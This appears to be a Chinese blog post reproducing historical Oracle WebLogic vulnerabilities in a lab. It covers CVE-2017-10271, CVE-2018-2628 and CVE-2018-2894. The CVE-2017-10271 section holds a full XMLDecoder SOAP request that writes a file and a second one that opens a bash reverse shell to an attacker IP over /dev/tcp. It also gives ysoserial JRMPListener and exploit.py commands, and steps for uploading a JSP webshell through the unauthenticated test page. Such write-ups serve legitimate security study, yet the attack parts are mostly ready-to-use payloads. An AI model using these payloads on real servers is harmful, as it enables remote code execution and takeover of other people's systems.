weblogic历史漏洞复现

前言

weblogic的历史漏洞复现

PS:

WebLogic写shell时,需要注意要将shell写到能够解析jsp或者jspx的目录下

快速定位weblogic的目录

1
linux:find / -name weblogic -print

image-20210422154718010

1
for /r 目录名 %i in (匹配模式1,匹配模式2) do @echo %i

image-20210423140759758

自己搭建了一下环境,weblogic中可解析jsp或者jspx的常见目录为:

1
/Oracle/Middleware/user_projects/domains/用户域/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war

复现

CVE-2017-10271

1
WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击

受影响版本:

1
10.3.6.0.012.1.3.0.012.2.1.1.012.2.1.2.0

漏洞初步判断:

访问http://192.168.1.27:7001/wls-wsat/CoordinatorPortType

写入test.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.8.148:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 756

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.6.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println">
<string>xmldecoder_vul_test</string></void><void method="close"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

image-20200424082459431

然后访问该文件http://192.16.1.27/wls-wsat/test.txt

image-20200424082544784

说明漏洞存在

反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.1.26/7089 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

image-20200424082716908

参考文章:

WebLogic XMLDecoder反序列化漏洞

理解Java反序列化漏洞(1)

weblogic XMLDecoder反序列化漏洞-CVE-2017-10271

CVE-2018-2628

1
在 WebLogic 里,攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。

影响版本:

1
2
3
4
5
6
7
OracleWebLogicServer10.3.6.0  

OracleWebLogicServer12.1.3.0

OracleWebLogicServer12.2.1.2

OracleWebLogicServer12.2.1.3

首先在JRMPListener主机上运行命令,并写上要执行的命令

1
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "touch /tmp/shellllllll"

image-20200424185927177

然后运行exploit脚本

1
2
3
4
python exploit.py [目标ip] [目标port] [ysoserial路径] [JRMPListener ip] [JRMPListener port] [JRMPClient]
e.g.
a) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient (Using java.rmi.registry.Registry)
b) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient2 (Using java.rmi.activation.Activator)

如下:

1
python exploit.py 192.168.1.27 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.1.9 1099 JRMPClient

image-20200424190115753

验证一下:到docker中

1
docker exec -ti cve20182628_weblogic_1 /bin/bash

image-20200424190420467

CVE-2018-2894

1
2
3
Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。

Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制。两个页面分别为/ws_utc/begin.do、/ws_utc/config.do

影响版本:

1
weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3

vulnhub搭建靶场,查看一下管理员密码

image-20200421202550352

1
2
admin-username:weblogic
password:gU4LJ4Ju

登录后台页面,点击base_domain的配置,在 高级 中勾选 启用Web 服务测试页’ 选项,然后保存配置。

image-20200421203327347

访问http://192.168.1.27:7001/ws_utc/config.do

设置Work Home Dir为:

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

访问这个目录是无需权限的,这一点很重要。

image-20200421203612086

安全中上传shell,jsp

image-20200421203651435访问http://192.168.1.27:7001/ws_utc/css/config/keystore/[时间戳]_[文件名],即可执行shell

image-20200421203838471

image-20200421204458519

CVE-2019-2725

image-20210423142856664

CVE-2020-14882

image-20210423152811693

image-20210423152823771

Author: 我是小吴啦
Link: http://yoursite.com/2020/03/21/weblogic%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.